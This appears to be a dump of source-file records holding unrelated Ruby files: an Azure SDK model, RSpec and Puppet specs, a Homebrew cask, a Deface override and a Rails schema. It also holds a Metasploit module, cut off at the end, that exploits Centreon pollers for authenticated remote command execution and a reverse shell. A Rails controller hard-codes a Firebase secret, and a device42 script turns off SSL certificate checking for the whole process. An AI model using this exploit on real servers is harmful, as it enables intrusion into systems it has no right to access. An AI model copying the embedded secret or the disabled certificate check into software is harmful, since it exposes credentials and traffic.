hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e9bffeb8867bb90e773c39b00879544834766a0a | 3,348 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Cosmosdb::Mgmt::V2019_12_12
  module Models
    #
    # Parameters to create and update Cosmos DB Table.
    #
    class TableCreateUpdateParameters < ARMResourceProperties

      include MsRestAzure

      # @return [TableResource] The standard JSON format of a Table
      attr_accessor :resource

      # @return [CreateUpdateOptions] A key-value pair of options to be applied
      # for the request. This corresponds to the headers sent with the request.
      attr_accessor :options


      #
      # Mapper for TableCreateUpdateParameters class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      # NOTE: this file is generated by AutoRest (see file header); edits to
      # the mapper itself will be lost on regeneration.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'TableCreateUpdateParameters',
          type: {
            name: 'Composite',
            class_name: 'TableCreateUpdateParameters',
            model_properties: {
              # id/name/type are ARM identity fields populated by the service,
              # hence read_only.
              id: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'id',
                type: {
                  name: 'String'
                }
              },
              name: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              type: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'type',
                type: {
                  name: 'String'
                }
              },
              location: {
                client_side_validation: true,
                required: false,
                serialized_name: 'location',
                type: {
                  name: 'String'
                }
              },
              # Free-form string-to-string resource tags.
              tags: {
                client_side_validation: true,
                required: false,
                serialized_name: 'tags',
                type: {
                  name: 'Dictionary',
                  value: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'StringElementType',
                    type: {
                      name: 'String'
                    }
                  }
                }
              },
              # 'properties.*' serialized names are flattened from the nested
              # ARM "properties" envelope onto this model. Both are required
              # for create/update requests.
              resource: {
                client_side_validation: true,
                required: true,
                serialized_name: 'properties.resource',
                type: {
                  name: 'Composite',
                  class_name: 'TableResource'
                }
              },
              options: {
                client_side_validation: true,
                required: true,
                serialized_name: 'properties.options',
                type: {
                  name: 'Composite',
                  class_name: 'CreateUpdateOptions'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 29.892857 | 79 | 0.453405 |
3925efd8af634743cbbc1dfa9f87e5d555b273fb | 3,042 | describe RedClothParslet::Parser::Attributes::LinkUri do
let(:parser) { described_class.new }
# Though technically valid, punctuation is not allowed at the end of a URL in
# the context of inline Textile.
describe "termination" do
it { should parse("http://red.cloth.org") }
it { should parse("http://redcloth.org./") }
TERMINAL_LINK_PUNCTUATION = %w(. ! , ;)
TERMINAL_LINK_PUNCTUATION.each do |punct|
it { should parse("http://redcloth.org/text#{punct}ile") }
it { should parse("http://redcloth.org/text#{punct}ile.html") }
it { should parse("http://redcloth.org/text#{punct}ile/") }
it { should parse("http://redcloth.org/#{punct}#") }
it { should parse("http://redcloth.org/#foo#{punct}bar") }
it { should parse("/foo#{punct}bar") }
it { should parse("/foo#{punct}/") }
it { should parse("foo#{punct}bar") }
it { should parse("foo#{punct};bar") }
it { should parse("foo;bar#{punct}baz") }
it { should parse("index?foo=bar#{punct}baz") }
end
(TERMINAL_LINK_PUNCTUATION + [')']).each do |punct|
it { should_not parse("http://redcloth.org#{punct}") }
it { should_not parse("http://redcloth.org/#{punct}") }
it { should_not parse("http://redcloth.org/textile#{punct}") }
it { should_not parse("http://redcloth.org/textile.html#{punct}") }
it { should_not parse("http://redcloth.org/textile/#{punct}") }
it { should_not parse("http://redcloth.org/##{punct}") }
it { should_not parse("http://redcloth.org/#foo#{punct}") }
it { should_not parse("/foo#{punct}") }
it { should_not parse("/foo/#{punct}") }
it { should_not parse("foo#{punct}") }
it { should_not parse("foo;bar#{punct}") }
it { should_not parse("index?foo=bar#{punct}") }
end
end
describe "matched parentheses" do
it { should parse("http://redcloth.org/text(ile)") }
it { should parse("http://redcloth.org/text(ile).html") }
it { should parse("http://redcloth.org/text(ile)/") }
it { should parse("http://redcloth.org/text(ile)#") }
it { should parse("http://redcloth.org/#foo(bar)") }
it { should parse("/foo(bar)") }
it { should parse("/foo(bar)/") }
it { should parse("foo(bar)") }
it { should parse("foo(t);bar") }
it { should parse("foo;bar(none)baz") }
it { should parse("index?foo=bar(none)baz") }
it { should parse("#foo(bar)") }
end
describe "opening parentheses" do
it { should parse("http://redcloth.org/text(ile") }
it { should parse("http://redcloth.org/text(ile.html") }
it { should parse("http://redcloth.org/text(ile/") }
it { should parse("http://redcloth.org/text(ile#") }
it { should parse("http://redcloth.org/#foo(bar") }
it { should parse("/foo(bar") }
it { should parse("/foo(bar/") }
it { should parse("foo(bar") }
it { should parse("foo(t;bar") }
it { should parse("foo;bar(nonebaz") }
it { should parse("index?foo=bar(nonebaz") }
it { should parse("#foo(bar") }
end
end
| 41.671233 | 79 | 0.605851 |
6a9f3ce26532891c527c8e4b1469b05283facd77 | 4,014 | require 'spec_helper'
describe 'openstacklib::db::postgresql' do
  password_hash = 'AA1420F182E88B9E5F874F6FBE7459291E8F4601'
  title = 'nova'

  let (:title) { title }

  let :required_params do
    { :password_hash => password_hash }
  end

  let (:pre_condition) do
    "include ::postgresql::server"
  end

  # The exact same behaviour is expected on every osfamily, so the examples
  # are shared between the RedHat and Debian contexts below.
  shared_examples 'openstacklib::db::postgresql examples' do
    context 'with only required parameters' do
      let :params do
        required_params
      end

      it { is_expected.to contain_postgresql__server__db(title).with(
        :user     => title,
        :password => password_hash
      )}
    end

    context 'when overriding encoding' do
      let :params do
        { :encoding => 'latin1' }.merge(required_params)
      end

      it { is_expected.to contain_postgresql__server__db(title).with_encoding(params[:encoding]) }
    end

    context 'when omitting the required parameter password_hash' do
      let :params do
        # FIX: Hash#delete returns the deleted *value* (a String), not the
        # remaining hash, so the original `required_params.delete(...)` never
        # produced a valid params hash. Build a hash without the key instead.
        required_params.reject { |key, _value| key == :password_hash }
      end

      # FIX: the original `it { expect { is_expected.to raise_error(...) } }`
      # never invoked `.to` on the outer expectation, so it asserted nothing.
      # Forcing catalogue compilation surfaces the missing-parameter error.
      it { expect { catalogue }.to raise_error(Puppet::Error) }
    end

    context 'when notifying other resources' do
      let :pre_condition do
        "include ::postgresql::server
         exec { 'nova-db-sync': }"
      end
      let :params do
        { :notify => 'Exec[nova-db-sync]'}.merge(required_params)
      end

      it { is_expected.to contain_exec('nova-db-sync').that_subscribes_to("Openstacklib::Db::Postgresql[#{title}]") }
    end

    context 'when required for other openstack services' do
      let :pre_condition do
        "include ::postgresql::server
         service {'keystone':}"
      end
      let :title do
        'keystone'
      end
      let :params do
        { :before => 'Service[keystone]'}.merge(required_params)
      end

      it { is_expected.to contain_service('keystone').that_requires("Openstacklib::Db::Postgresql[keystone]") }
    end
  end

  context 'on a RedHat osfamily' do
    let :facts do
      {
        :osfamily                  => 'RedHat',
        :operatingsystem           => 'RedHat',
        :operatingsystemrelease    => '7.1',
        :operatingsystemmajrelease => '7',
        :concat_basedir            => '/tmp',
      }
    end

    include_examples 'openstacklib::db::postgresql examples'
  end

  context 'on a Debian osfamily' do
    let :facts do
      {
        :osfamily                  => 'Debian',
        :operatingsystem           => 'Debian',
        :operatingsystemrelease    => 'jessie',
        :operatingsystemmajrelease => '8.2',
        :concat_basedir            => '/tmp',
      }
    end

    include_examples 'openstacklib::db::postgresql examples'
  end
end
| 26.939597 | 116 | 0.606876 |
2194cb54b13d95dbefabb87c0fb1743da205cd57 | 3,719 | cask "karabiner-elements" do
if MacOS.version <= :el_capitan
version "11.6.0"
sha256 "c1b06252ecc42cdd8051eb3d606050ee47b04532629293245ffdfa01bbc2430d"
url "https://pqrs.org/osx/karabiner/files/Karabiner-Elements-#{version}.dmg"
pkg "Karabiner-Elements.sparkle_guided.pkg"
elsif MacOS.version <= :mojave
version "12.10.0"
sha256 "53252f7d07e44f04972afea2a16ac595552c28715aa65ff4a481a1c18c8be2f4"
url "https://github.com/pqrs-org/Karabiner-Elements/releases/download/v#{version}/Karabiner-Elements-#{version}.dmg",
verified: "github.com/pqrs-org/Karabiner-Elements/"
pkg "Karabiner-Elements.sparkle_guided.pkg"
else
version "13.7.0"
sha256 "9ac5e53a71f3a00d7bdb2f5f5f001f70b6b8b7b2680e10a929e0e4c488c8734b"
url "https://github.com/pqrs-org/Karabiner-Elements/releases/download/v#{version}/Karabiner-Elements-#{version}.dmg",
verified: "github.com/pqrs-org/Karabiner-Elements/"
pkg "Karabiner-Elements.pkg"
end
name "Karabiner Elements"
desc "Keyboard customizer"
homepage "https://pqrs.org/osx/karabiner/"
livecheck do
url "https://pqrs.org/osx/karabiner/files/karabiner-elements-appcast.xml"
strategy :sparkle
end
auto_updates true
depends_on macos: ">= :el_capitan"
if MacOS.version <= :mojave
uninstall signal: [
["TERM", "org.pqrs.Karabiner-Menu"],
["TERM", "org.pqrs.Karabiner-NotificationWindow"],
],
pkgutil: "org.pqrs.Karabiner-Elements",
launchctl: [
"org.pqrs.karabiner.agent.karabiner_grabber",
"org.pqrs.karabiner.agent.karabiner_observer",
"org.pqrs.karabiner.karabiner_console_user_server",
"org.pqrs.karabiner.karabiner_kextd",
"org.pqrs.karabiner.karabiner_session_monitor",
],
script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-Elements/uninstall_core.sh",
sudo: true,
},
delete: "/Library/Application Support/org.pqrs/"
else
uninstall early_script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-DriverKit-VirtualHIDDevice/scripts/uninstall/remove_files.sh",
sudo: true,
},
signal: [
["TERM", "org.pqrs.Karabiner-Menu"],
["TERM", "org.pqrs.Karabiner-NotificationWindow"],
],
pkgutil: [
"org.pqrs.Karabiner-DriverKit-VirtualHIDDevice",
"org.pqrs.Karabiner-Elements",
],
launchctl: [
"org.pqrs.karabiner.agent.karabiner_grabber",
"org.pqrs.karabiner.agent.karabiner_observer",
"org.pqrs.karabiner.karabiner_console_user_server",
"org.pqrs.karabiner.karabiner_session_monitor",
],
script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-Elements/uninstall_core.sh",
sudo: true,
},
delete: "/Library/Application Support/org.pqrs/"
# The system extension 'org.pqrs.Karabiner-DriverKit-VirtualHIDDevice*' should not be uninstalled by Cask
end
zap trash: [
"~/.config/karabiner",
"~/.local/share/karabiner",
"~/Library/Application Scripts/org.pqrs.Karabiner-VirtualHIDDevice-Manager",
"~/Library/Application Support/Karabiner-Elements",
"~/Library/Caches/org.pqrs.Karabiner-Elements.Updater",
"~/Library/Containers/org.pqrs.Karabiner-VirtualHIDDevice-Manager",
"~/Library/Preferences/org.pqrs.Karabiner-Elements.Updater.plist",
]
end
| 39.56383 | 129 | 0.639419 |
91ef17fcc61215c2c3214f37f93658af957ed4e4 | 1,259 | # frozen_string_literal: true
require 'pdf_mage/workers/render_pdf'
RSpec.describe PdfMage::Workers::RenderPdf do
  describe '#perform' do
    let(:callback_url) { 'https://example.com/callback' }
    let(:filename) { nil }
    let(:meta) { nil }
    let(:website_url) { 'https://google.com' }

    subject do
      PdfMage::Workers::RenderPdf.perform_async(website_url, callback_url, filename, meta)
    end

    # NOTE(review): every example below is an empty placeholder — the spec
    # documents intended behaviour but asserts nothing yet. Consider marking
    # them `pending` (or implementing them) so they are not reported as green.
    context 'when given a filename' do
      it 'exports a PDF to the path that matches the filename' do
      end
    end

    context 'when not given a filename' do
      it 'exports a PDF to a path with a generated filename' do
      end
    end

    context 'when an aws_account_key is present' do
      it 'starts an upload file job' do
      end

      context 'and a callback url is present' do
        it 'starts an upload file job' do
        end
      end
    end

    context 'when an aws_account_key is not present' do
      it 'does not start an upload file job' do
      end

      context 'and a callback url is present' do
        it 'starts a send webhook job' do
        end
      end

      context 'and a callback url is not present' do
        it 'does not start a send webhook job' do
        end
      end
    end
  end
end
| 24.211538 | 90 | 0.635425 |
016b8ef16a68dbeca1060e8187155dec32969261 | 7,516 | module Deface
class Override
include OriginalValidator
include Applicator
extend Applicator::ClassMethods
extend Search::ClassMethods
cattr_accessor :_early, :current_railtie
attr_accessor :args, :parsed_document, :failure
@@_early = []
# Initializes new override, you must supply only one Target, Action & Source
# parameter for each override (and any number of Optional parameters).
#
# See READme for more!
def initialize(args, &content)
if Rails.application.try(:config).try(:deface).try(:enabled)
unless Rails.application.config.deface.try(:overrides)
@@_early << args
warn "[WARNING] You no longer need to manually require overrides, remove require for '#{args[:name]}'."
return
end
else
warn "[WARNING] You no longer need to manually require overrides, remove require for '#{args[:name]}'."
return
end
# If no name was specified, use the filename and line number of the caller
# Including the line number ensure unique names if multiple overrides
# are defined in the same file
unless args.key? :name
parts = caller[0].split(':')
file_name = File.basename(parts[0], '.rb')
line_number = parts[1]
args[:name] = "#{file_name}_#{line_number}"
end
raise(ArgumentError, ":name must be defined") unless args.key? :name
raise(ArgumentError, ":virtual_path must be defined") if args[:virtual_path].blank?
args[:text] = content.call if block_given?
args[:name] = "#{current_railtie.underscore}_#{args[:name]}" if Rails.application.try(:config).try(:deface).try(:namespaced) || args.delete(:namespaced)
virtual_key = args[:virtual_path].to_sym
name_key = args[:name].to_s.parameterize
self.class.all[virtual_key] ||= {}
if self.class.all[virtual_key].has_key? name_key
#updating exisiting override
@args = self.class.all[virtual_key][name_key].args
#check if the action is being redefined, and reject old action
if (self.class.actions & args.keys).present?
@args.reject!{|key, value| (self.class.actions & @args.keys).include? key }
end
#check if the source is being redefined, and reject old action
if (Deface::DEFAULT_SOURCES.map(&:to_sym) & args.keys).present?
@args.reject!{|key, value| (Deface::DEFAULT_SOURCES.map(&:to_sym) & @args.keys).include? key }
end
@args.merge!(args)
else
#initializing new override
@args = args
raise(ArgumentError, ":action is invalid") if self.action.nil?
end
#set loaded time (if not already present) for hash invalidation
@args[:updated_at] ||= Time.zone.now.to_f
@args[:railtie_class] = self.class.current_railtie
self.class.all[virtual_key][name_key] = self
expire_compiled_template
self
end
def selector
@args[self.action]
end
def name
@args[:name]
end
def railtie_class
@args[:railtie_class]
end
def sequence
return 100 unless @args.key?(:sequence)
if @args[:sequence].is_a? Hash
key = @args[:virtual_path].to_sym
if @args[:sequence].key? :before
ref_name = @args[:sequence][:before]
if self.class.all[key].key? ref_name.to_s
return self.class.all[key][ref_name.to_s].sequence - 1
else
return 100
end
elsif @args[:sequence].key? :after
ref_name = @args[:sequence][:after]
if self.class.all[key].key? ref_name.to_s
return self.class.all[key][ref_name.to_s].sequence + 1
else
return 100
end
else
#should never happen.. tut tut!
return 100
end
else
return @args[:sequence].to_i
end
rescue SystemStackError
if defined?(Rails)
Rails.logger.error "\e[1;32mDeface: [WARNING]\e[0m Circular sequence dependency includes override named: '#{self.name}' on '#{@args[:virtual_path]}'."
end
return 100
end
def action
(self.class.actions & @args.keys).first
end
# Returns the markup to be inserted / used
#
def source
sources = Rails.application.config.deface.sources
source = sources.find { |source| source.to_sym == source_argument }
raise(DefaceError, "Source #{source} not found.") unless source
source.execute(self) || ''
end
# Returns a :symbol for the source argument present
#
def source_argument
Deface::DEFAULT_SOURCES.detect { |source| @args.key? source.to_sym }.try :to_sym
end
def source_element
Deface::Parser.convert(source.clone)
end
def safe_source_element
return unless source_argument
source_element
end
def disabled?
@args.key?(:disabled) ? @args[:disabled] : false
end
def end_selector
return nil if @args[:closing_selector].blank?
@args[:closing_selector]
end
# returns attributes hash for attribute related actions
#
def attributes
@args[:attributes] || []
end
# Alters digest of override to force view method
# recompilation (when source template/partial changes)
#
def touch
@args[:updated_at] = Time.zone.now.to_f
end
# Creates MD5 hash of args sorted keys and values
# used to determine if an override has changed
#
def digest
to_hash = @args.keys.map(&:to_s).sort.concat(@args.values.map(&:to_s).sort).join
Deface::Digest.hexdigest(to_hash)
end
# Creates MD5 of all overrides that apply to a particular
# virtual_path, used in CompiledTemplates method name
# so we can support re-compiling of compiled method
# when overrides change. Only of use in production mode.
#
def self.digest(details)
overrides = self.find(details)
to_hash = overrides.inject('') { |digest, override| digest << override.digest }
Deface::Digest.hexdigest(to_hash)
end
def self.all
Rails.application.config.deface.overrides.all
end
def self.actions
Rails.application.config.deface.actions.map &:to_sym
end
private
# check if method is compiled for the current virtual path
#
def expire_compiled_template
if Gem.loaded_specs["rails"].version < Gem::Version.new("6.0.0.beta1")
if compiled_method_name = ActionView::CompiledTemplates.instance_methods.detect { |name| name =~ /#{args[:virtual_path].gsub(/[^a-z_]/, '_')}/ }
#if the compiled method does not contain the current deface digest
#then remove the old method - this will allow the template to be
#recompiled the next time it is rendered (showing the latest changes)
unless compiled_method_name =~ /\A_#{self.class.digest(:virtual_path => @args[:virtual_path])}_/
ActionView::CompiledTemplates.send :remove_method, compiled_method_name
end
end
else
if compiled_method_name = ActionDispatch::DebugView.instance_methods.detect { |name| name =~ /#{args[:virtual_path].gsub(/[^a-z_]/, '_')}/ }
unless compiled_method_name =~ /\A_#{self.class.digest(:virtual_path => @args[:virtual_path])}_/
ActionDispatch::DebugView.send :remove_method, compiled_method_name
end
end
end
end
end
end
| 31.447699 | 158 | 0.637041 |
1d20db726e7847995f82c67117db145824bf845c | 1,158 | # Sources/resources:
# https://stackoverflow.com/questions/11806004/rails-activerecord-db-sort-operation-case-insensitive
class StaticPagesController < ApplicationController
  # require 'firebase'

  # Responds to the Let's Encrypt ACME HTTP-01 challenge for domain
  # validation. NOTE(review): `render text:` was removed in Rails 5.1 —
  # switch to `render plain:` when upgrading; confirm the app's Rails version.
  def letsencrypt
    render text: "#{params[:id]}.9l4va-Uy7XrFPGS51hnH7HwkF2nn3XhwfuR8U5ylxIM"
  end

  # The homepage of the app: builds the feed, rating feed and event list
  # for logged-in users.
  def home
    if logged_in?
      @micropost = current_user.microposts.build
      @feed_items = current_user.feed.paginate(page: params[:page])
      @rating_items = current_user.rating_feed.paginate(page: params[:page])
      # @events = Event.all
      @time = Time.now + 60.days
      @start = Time.now - 1.days
      # @events = Event.where(:date => @start..@time)
      @events = Event.all
    end

    # SECURITY FIX: the Firebase database secret was previously hard-coded
    # here (it must be considered leaked — rotate it), and the client built
    # from it was assigned to a local that was never used. Credentials are
    # now read from the environment and the client is only constructed when
    # a secret is configured.
    firebase_url = ENV.fetch('FIREBASE_URL', 'https://skatespots-3a8f0.firebaseio.com')
    firebase_secret = ENV['FIREBASE_SECRET']
    Firebase::Client.new(firebase_url, firebase_secret) if firebase_secret
  end

  def help
  end

  def contact
  end

  # Lists approved organizations, sorted case-insensitively by name.
  # (lower(name) is used because the default order is case-sensitive.)
  def skate_links
    # @organizations = Organization.where(:approved => true).order(name: :asc)
    @organizations = Organization.where(:approved => true).order("lower(name) ASC").all
  end

  def testing
  end
end
| 26.930233 | 100 | 0.724525 |
6a541c1c77ab883ce80d47a6ab8c3b12744e3bed | 1,508 | # encoding: utf-8
# Uploader for pin images. Stores files on the local filesystem and builds
# a 300x300-bounded thumbnail version via MiniMagick.
class PinImageUploader < CarrierWave::Uploader::Base

  # Include RMagick or MiniMagick support:
  # include CarrierWave::RMagick
  include CarrierWave::MiniMagick

  # Choose what kind of storage to use for this uploader:
  storage :file
  # storage :fog

  # Override the directory where uploaded files will be stored.
  # This is a sensible default for uploaders that are meant to be mounted:
  def store_dir
    "uploads/#{model.class.to_s.underscore}/#{mounted_as}/#{model.id}"
  end

  # Provide a default URL as a default if there hasn't been a file uploaded:
  # def default_url
  #   # For Rails 3.1+ asset pipeline compatibility:
  #   # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_'))
  #
  #   "/images/fallback/" + [version_name, "default.png"].compact.join('_')
  # end

  # Process files as they are uploaded:
  # process :scale => [200, 300]
  #
  # def scale(width, height)
  #   # do something
  # end

  # Create different versions of your uploaded files:
  # resize_to_fit keeps aspect ratio, bounding the image within 300x300.
  version :thumb do
    process :resize_to_fit => [300, 300]
  end

  # Add a white list of extensions which are allowed to be uploaded.
  # For images you might use something like this:
  # def extension_white_list
  #   %w(jpg jpeg gif png)
  # end

  # Override the filename of the uploaded files:
  # Avoid using model.id or version_name here, see uploader/store.rb for details.
  # def filename
  #   "something.jpg" if original_filename
  # end

end
| 29 | 112 | 0.699602 |
ffc5b87b6aa0329f4c60138864d50286069735be | 2,203 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170602075004) do

  # User-authored status posts, optionally with an attached picture.
  create_table "microposts", force: :cascade do |t|
    t.text "content"
    t.integer "user_id"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
    t.string "picture"
    t.index ["user_id", "created_at"], name: "index_microposts_on_user_id_and_created_at"
    t.index ["user_id"], name: "index_microposts_on_user_id"
  end

  # Follower/followed join records between users; the composite unique
  # index prevents duplicate follow relationships.
  create_table "relationships", force: :cascade do |t|
    t.integer "follower_id"
    t.integer "followed_id"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
    t.index ["followed_id"], name: "index_relationships_on_followed_id"
    t.index ["follower_id", "followed_id"], name: "index_relationships_on_follower_id_and_followed_id", unique: true
    t.index ["follower_id"], name: "index_relationships_on_follower_id"
  end

  # Accounts, with hashed digests for password, remember-me, account
  # activation and password reset.
  create_table "users", force: :cascade do |t|
    t.string "name"
    t.string "email"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
    t.string "password_digest"
    t.string "remember_digest"
    t.boolean "admin", default: false
    t.string "activation_digest"
    t.boolean "activated", default: false
    t.datetime "activated_at"
    t.string "reset_digest"
    t.datetime "reset_sent_at"
    t.index ["email"], name: "index_users_on_email", unique: true
  end

end
| 42.365385 | 116 | 0.705856 |
bfee72f63afc72fa2ecf7e2b29c81de69d4cb76e | 304 | url = node['device42']['instance']
user = node['device42']['user']
password = node['device42']['password']

# WARNING: reassigning this constant globally disables TLS peer verification
# for the entire process — a dangerous hack kept only for behavioural
# compatibility. Prefer configuring the HTTP client's verify mode instead.
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

# FIX: the original constructed two identical IPAM clients; reuse one for
# both the suggestion and the reservation.
ipam = IPAM.new(url, user, password)

# Ask device42 for a free address in the subnet, then reserve it.
ip = ipam.suggest_ip('10.90.0.0/16')
puts ip

reserved = ipam.reserve_ip(ip)
puts reserved
| 25.333333 | 61 | 0.707237 |
33148e92012a5fe7cd9cb17144238c3d07a61f28 | 10,542 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Centreon Poller Authenticated Remote Command Execution',
        'Description' => %q{
          An authenticated user with sufficient administrative rights to manage pollers can use this functionality to
          execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules
          (to perform certain actions), by the scheduler for data processing, etc.

          This module uses this functionality to obtain a remote shell on the target.
        },
        'Author' => [
          'Omri Baso', # discovery
          'Fabien Aunay', # discovery
          'mekhalleh (RAMELLA Sébastien)' # this module (FIX: repaired mojibake in name)
        ],
        'References' => [
          ['EDB', '47977']
        ],
        'DisclosureDate' => '2020-01-27',
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Reverse shell (In-Memory)',
            {
              'Platform' => 'unix',
              'Type' => :cmd_unix,
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Meterpreter (Dropper)',
            {
              'Platform' => 'linux',
              'Type' => :meterpreter,
              'Arch' => ARCH_X64,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
                'CMDSTAGER::FLAVOR' => :curl
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
      OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
      OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
    ])
  end

  # Registers a new poller (pointed at 127.0.0.1) that runs the previously
  # uploaded miscellaneous command identified by command_id.
  def create_new_poller(poller_name, command_id)
    params = { 'p' => '60901' }

    print_status('Create new poller entry on the target.')
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), params)
    return false unless token

    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'partial' => true,
      'vars_get' => params,
      'vars_post' => {
        'name' => poller_name,
        'ns_ip_address' => '127.0.0.1',
        'localhost[localhost]' => '1',
        'is_default[is_default]' => '0',
        'remote_id' => '',
        'ssh_port' => '22',
        'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
        'engine_start_command' => 'service centengine start',
        'engine_stop_command' => 'service centengine stop',
        'engine_restart_command' => 'service centengine restart',
        'engine_reload_command' => 'service centengine reload',
        'nagios_bin' => '/usr/sbin/centengine',
        'nagiostats_bin' => '/usr/sbin/centenginestats',
        'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
        'broker_reload_command' => 'service cbd reload',
        'centreonbroker_cfg_path' => '/etc/centreon-broker',
        'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
        'centreonbroker_logs_path' => '/var/log/centreon-broker',
        'centreonconnector_path' => '',
        'init_script_centreontrapd' => 'centreontrapd',
        'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
        'pollercmd[0]' => command_id,
        'clone_order_pollercmd_0' => '',
        'ns_activate[ns_activate]' => '1',
        'submitA' => 'Save',
        'id' => '',
        'o' => 'a',
        'centreon_token' => token
      }
    )
    return false unless response

    return true
  end

  # Uploads the payload as a Centreon "miscellaneous command", attaches it
  # to a fresh poller, then reloads that poller to trigger execution.
  def execute_command(command, _opts = {})
    cmd_name = rand_text_alpha(8..42)
    params = { 'p' => '60803', 'type' => '3' }
    poller_name = rand_text_alpha(8..42)

    ## Register a miscellaneous command.
    print_status('Upload command payload on the target.')
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), params)
    unless token
      print_bad('Could not get the upload form token, potentially due to insufficient access rights.')
      return false
    end

    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'partial' => true,
      'vars_get' => params,
      'vars_post' => {
        'command_name' => cmd_name,
        'command_type[command_type]' => '3',
        'command_line' => command,
        'resource' => '$CENTREONPLUGINS$',
        'plugins' => '/Centreon/SNMP',
        'macros' => '$ADMINEMAIL$',
        'command_example' => '',
        'listOfArg' => '',
        'listOfMacros' => '',
        'connectors' => '',
        'graph_id' => '',
        'command_activate[command_activate]' => '1',
        'command_comment' => '',
        'submitA' => 'Save',
        'command_id' => '',
        'type' => '3',
        'o' => 'a',
        'centreon_token' => token
      }
    )
    return false unless response

    ## Create new poller to serve the payload.
    create_new_poller(poller_name, get_command_id(cmd_name))

    ## Export configuration to reload to trigger the exploit.
    poller_id = get_poller_id(poller_name)
    if poller_id.nil?
      print_bad('Could not trigger the vulnerability!')
    end
    restart_exportation(poller_id)
  end

  # Authenticates against the Centreon Web panel; returns true on success.
  def get_auth
    print_status('Sending authentication request.')

    token = get_token(normalize_uri(target_uri.path, 'index.php'))
    unless token.nil?
      response = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => @cookies,
        'vars_post' => {
          'useralias' => datastore['USERNAME'],
          'password' => datastore['PASSWORD'],
          'submitLogin' => 'Connect',
          'centreon_token' => token
        }
      )
      return false unless response

      # A successful login redirects to main.php and refreshes the session.
      if response.redirect? && response.headers['location'].include?('main.php')
        print_good('Successfully authenticated.')
        @cookies = response.get_cookies
        return true
      end
    end

    print_bad('Your credentials are incorrect.')
    return false
  end

  # Scrapes the command listing page for the id of the named command.
  def get_command_id(cmd_name)
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'vars_get' => {
        'p' => '60803',
        'type' => '3'
      }
    )
    return nil unless response

    href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
    return nil unless href

    id = href.split('?')[1].split('&')[2].split('=')[1]
    return id unless id.empty?

    return nil
  end

  # Scrapes the poller listing page for the id of the named poller.
  def get_poller_id(poller_name)
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'main.get.php'),
      'cookie' => @cookies,
      'vars_get' => { 'p' => '60901' }
    )
    return nil unless response

    href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
    return nil unless href

    id = href.split('?')[1].split('&')[2].split('=')[1]
    return id unless id.empty?

    return nil
  end

  # Fetches an initial session cookie from the login page.
  # Returns nil when the target does not respond or sets no cookies.
  def get_session
    response = send_request_cgi(
      'method' => 'HEAD',
